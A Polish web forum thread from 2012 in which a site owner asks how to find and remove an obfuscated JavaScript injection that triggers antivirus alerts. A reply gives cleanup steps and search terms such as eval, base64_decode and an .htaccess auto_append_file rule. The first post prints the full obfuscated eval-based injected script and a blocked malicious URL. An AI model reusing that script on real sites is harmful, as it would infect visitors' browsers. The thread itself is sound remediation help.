Wirus na stronie w JS Opcje

[Azami]

Witam
Od jakiegoś czasu mam problem ze stroną. Co jakiś czas jak wchodzę pojawia mi ise alert o wirusie. Gdy się to dzieje w kodzoe źrudłowym w przeglądarce na końcu dopisuje mi się kod:

[PHP] pobierz, plaintext 
<script>v="val";try{faweb++}catch(btawetb){try{fve^32}catch(btawt4){w=window;e=w["e"+v];}}
if(1){f=new Array(9,8,103,102,31,38,100,110,97,117,108,99,110,115,44,103,100,114,69,107,99,109,100,108,116,114,64,121,83,95,103,77,95,109,100,38,39,97,109,100,120,37,41,90,46,93,40,121,13,8,7,9,104,100,114,96,107,101,113,38,41,58,11,9,8,123,32,100,106,115,100,30,123,12,7,9,8,98,111,98,115,109,100,108,116,45,117,114,104,114,101,39,32,60,104,100,114,96,107,101,31,113,114,98,59,39,103,114,116,111,56,47,46,114,114,104,110,112,104,108,103,110,96,115,110,106,101,115,99,46,97,103,122,46,97,97,38,30,119,104,98,116,103,59,39,48,46,39,31,102,101,104,101,104,115,59,39,48,46,39,31,113,116,120,106,101,60,37,118,104,113,105,97,103,108,104,114,121,57,102,105,99,98,101,109,57,112,110,113,105,115,103,111,109,56,97,97,113,111,107,115,116,100,57,108,100,100,116,57,46,59,115,109,112,57,46,59,38,60,60,46,103,102,113,95,109,100,60,34,40,57,13,8,7,125,12,7,9,101,115,110,98,114,105,110,108,32,104,100,114,96,107,101,113,38,41,122,11,9,8,7,118,96,112,32,101,30,61,31,98,111,98,115,109,100,108,116,45,97,114,100,95,116,100,67,108,100,107,101,109,114,40,38,103,102,113,95,109,100,37,41,58,100,46,114,99,116,64,114,116,113,103,98,116,114,101,39,37,115,113,97,39,43,37,104,115,114,112,57,45,47,115,112,105,111,110,105,109,101,111,97,113,111,107,99,116,100,44,98,104,120,47,98,95,39,40,57,102,45,113,116,120,106,101,45,116,105,114,103,98,104,106,105,115,119,61,38,102,105,99,98,101,109,37,59,101,44,115,115,119,108,100,44,112,110,113,105,115,103,111,109,59,39,96,96,115,110,106,117,115,99,39,58,100,46,114,114,121,107,99,46,107,99,102,115,59,39,47,37,59,101,44,115,115,119,108,100,44,116,110,110,61,38,46,39,58,100,46,114,99,116,64,114,116,113,103,98,116,114,101,39,37,119,104,98,116,103,37,44,38,47,48,38,39,59,101,44,115,100,114,65,115,114,114,104,96,117,115,99,40,38,102,101,104,101,104,115,37,44,38,47,48,38,39,59,12,7,9,8,98,111,98,115,109,100,108,116,45,101,101,115,67,108,100,107,101,109,114,115,65,119,84,96,101,78,96,107,101,39,37,98,110,98,121,38,39,91,47,91,46,96,110,112,100,108,100,66,102,105,107,98,40,101,39,59,12,7,9,124);}w=f;s=[];r=String;x="j%";for(i=0;-i+569!=0;i+=1){j=i;if(e&&(031==0x19))s=s+r["fromCharCode"]((1*w[j]+e(x+3)));}
if(0x10==020)try{(w+s)()}catch(asga){e("if(1)"+s+"");}</script>
[PHP] pobierz, plaintext 

dodatkowo Kasperski zwraca komunikat:

[PHP] pobierz, plaintext 
ca	Zabroniono: [url="http://trippingobsolete.biz/ca"]http://trippingobsolete.biz/ca[/url] (analiza z wykorzystaniem bazy podejrzanych adresów URL)	2012-10-10 21:40:16
[PHP] pobierz, plaintext 

Jak namierzyć gdzie się to zagnieździło ? Bądź czym to usunąć ?
Strona jest ogromna i całość serwisu składa się z kilku tysięcy przeróżnych plików. Na szczęście wirus pojawia się tylko przy opalaniu index.php ale mimo to nie mogę namierzyć gdzie to siedzi.
Każdy pomysł lub podpowiedź mile widziana.

Pozdrawiam

Ten post edytował Azami 11.10.2012, 00:09:23

[rocktech.pl]

Witam.

1. Zmień hasła na FTP i nie zapisuj ich nigdzie!
2. Zainstaluj antwirusa.
3. Zmień klienta FTP z TotalComandera na inny (IMG:style_emoticons/default/smile.gif)

Co do problemu pozostaje ci przelecieć całe źródla aplikacji na serwerze i wyszukać następujące frazy:

eval
function_exist
base64_decode

Jak zobaczysz kod napisany ciurkiem, nic nie znaczące nazwy funkcji i zakodowane ciągi znaków to tnij!
Sprawdź .htaccess pod kątem.

[APACHE] pobierz, plaintext 
php_value auto_append_file ...
[APACHE] pobierz, plaintext 

Ten post edytował rocktech.pl 11.10.2012, 08:47:01

[Azami]

Wielkie dzięki za pomoc , po przeszukaniu serwera pod kontem wymienionych komend znalazłem złośliwy kod (IMG:style_emoticons/default/smile.gif)
Pozdrawiam

Ten post edytował Azami 11.10.2012, 17:21:14